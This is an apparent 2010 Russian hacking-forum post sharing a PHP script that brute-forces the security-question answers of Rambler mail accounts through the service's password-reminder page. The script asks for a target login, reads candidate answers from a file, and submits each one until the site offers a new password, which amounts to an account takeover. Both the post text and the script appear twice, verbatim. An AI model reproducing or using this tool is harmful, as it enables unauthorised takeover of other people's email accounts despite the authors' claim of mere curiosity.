Kusto
27.02.2010, 00:02
Дело было вечером, делать было нефига как общаться по аське, в этот раз фигней страдали с zifanchuck'ом профиль моего большого ачатовского друга вот http://forum.antichat.ru/member.php?userid=66836 Ну что- дискутировали по поводу- а можно ли подобрать брутом ответ на контрольный вопрос? Обьектом нашего изучения стал рамблер, и вот как мы непытались вручную (путем многократных запросов) уйти в бан- так нифига и неудавалось.... (каптчу просили ввести только один, самый первый раз ), вот на этой волне и родился данный скрипт который мы предоставляем Вашему вниманию. А еще у нас с ним пари- как быстро админы рамблера прикроют откровенный баг))) (на много слов не тестили но после 200-300 неправильных находит правильный ответ), ответы нужно складывать в файл my.txt (в столбик- разумееться :D )
А да и чтоб было все по честному в скрипте проостенькая защита от школьников, так что неспрашивайте почему выдает ошибку при подключении))) Ну а сам скрипт собственно говоря вот))
P.S. И прошу не пинать так как данный скрипт писался для того чтоб удовлетворить наше любопытство и цель создания орудия для вскрытия ящиков перед нами не стояла))
<?php
// (c)Kusto & zifanchuck
//for forum.antichat.ru
set_time_limit(0);
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function read($path)
{
$file=fopen($path,"r");
$bufer = fread($file,filesize($path));
fclose($file);
return($bufer);
}
$file = 'my.txt';
$domain = $_POST['domain'];
$login = $_POST['login'];
$result = curl('http://id.rambler.ru/script/reminder.cgi','');
$result = iconv("utf-8", "windows-1251", $result);
//получаем адрес каптчи
preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap);
$c=$cap[1];
$id=$cap[2];
if($login)
{
$res = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$_POST['id']."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$_POST['captcha']."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0 %B8%D1%82%D1%8C"));
preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$res, $qves)
}
if ($qves[1])
{
echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";
$a = explode("\r\n",read($file));
for($i=0;$i<count($a);$i++)
{
$fam = $a[$i];
$bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));
if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}
else {echo "ответ $fam не подошел <br>";}
flush();
}
}
else { echo "<B><U><FONT SIZE=5 COLOR=RED>Внимательно заполняем каптчу</FONT></U></B></br>";
echo ' <label for="captcha">Введите показанные на картинке символы:</label><br><br><br>
<span id="captcha-wrapper" title="Введите показанные на картинке символы">
<span class="secimage-wrapper">
<img id="secimage" src="'.$c.'" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы">
<span class="dummy"></span>
</span><br><br>
<form name="captcha_form" method="POST">
<input type="text" name="captcha" value="" /><br>
<input type="hidden" name="id" value="'.$id.'" />
';
$err = '
<html>
<head>
<body bgcolor=#c0c0c0>
<form method="POST">
<p align=center>
<label for="id-login">кого брутим?</label>
<span class="indicator">
<input type="text" class="text" name="login" />
<select id="id-domain" class="text" name="domain" tabindex="1">
<option value="rambler.ru" >@rambler.ru</option>
<option value="lenta.ru" >@lenta.ru</option>
<option value="myrambler.ru" >@myrambler.ru</option>
<option value="autorambler.ru" >@autorambler.ru</option>
<option value="ro.ru" >@ro.ru</option>
<option value="r0.ru" >@r0.ru</option>
</select>
</span><br><br><br><br><br><br>
<input type=submit value="ПОЕХАЛИ!!!">
</form>
</center>
</body>
<head>
</html>';
echo $err;
}
?>
А да и чтоб было все по честному в скрипте проостенькая защита от школьников, так что неспрашивайте почему выдает ошибку при подключении))) Ну а сам скрипт собственно говоря вот))
P.S. И прошу не пинать так как данный скрипт писался для того чтоб удовлетворить наше любопытство и цель создания орудия для вскрытия ящиков перед нами не стояла))
<?php
// (c)Kusto & zifanchuck
//for forum.antichat.ru
set_time_limit(0);
function curl($url,$post)
{
$cfile = 'cookies.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function read($path)
{
$file=fopen($path,"r");
$bufer = fread($file,filesize($path));
fclose($file);
return($bufer);
}
$file = 'my.txt';
$domain = $_POST['domain'];
$login = $_POST['login'];
$result = curl('http://id.rambler.ru/script/reminder.cgi','');
$result = iconv("utf-8", "windows-1251", $result);
//получаем адрес каптчи
preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap);
$c=$cap[1];
$id=$cap[2];
if($login)
{
$res = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$_POST['id']."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$_POST['captcha']."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0 %B8%D1%82%D1%8C"));
preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$res, $qves)
}
if ($qves[1])
{
echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";
$a = explode("\r\n",read($file));
for($i=0;$i<count($a);$i++)
{
$fam = $a[$i];
$bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));
if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}
else {echo "ответ $fam не подошел <br>";}
flush();
}
}
else { echo "<B><U><FONT SIZE=5 COLOR=RED>Внимательно заполняем каптчу</FONT></U></B></br>";
echo ' <label for="captcha">Введите показанные на картинке символы:</label><br><br><br>
<span id="captcha-wrapper" title="Введите показанные на картинке символы">
<span class="secimage-wrapper">
<img id="secimage" src="'.$c.'" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы">
<span class="dummy"></span>
</span><br><br>
<form name="captcha_form" method="POST">
<input type="text" name="captcha" value="" /><br>
<input type="hidden" name="id" value="'.$id.'" />
';
$err = '
<html>
<head>
<body bgcolor=#c0c0c0>
<form method="POST">
<p align=center>
<label for="id-login">кого брутим?</label>
<span class="indicator">
<input type="text" class="text" name="login" />
<select id="id-domain" class="text" name="domain" tabindex="1">
<option value="rambler.ru" >@rambler.ru</option>
<option value="lenta.ru" >@lenta.ru</option>
<option value="myrambler.ru" >@myrambler.ru</option>
<option value="autorambler.ru" >@autorambler.ru</option>
<option value="ro.ru" >@ro.ru</option>
<option value="r0.ru" >@r0.ru</option>
</select>
</span><br><br><br><br><br><br>
<input type=submit value="ПОЕХАЛИ!!!">
</form>
</center>
</body>
<head>
</html>';
echo $err;
}
?>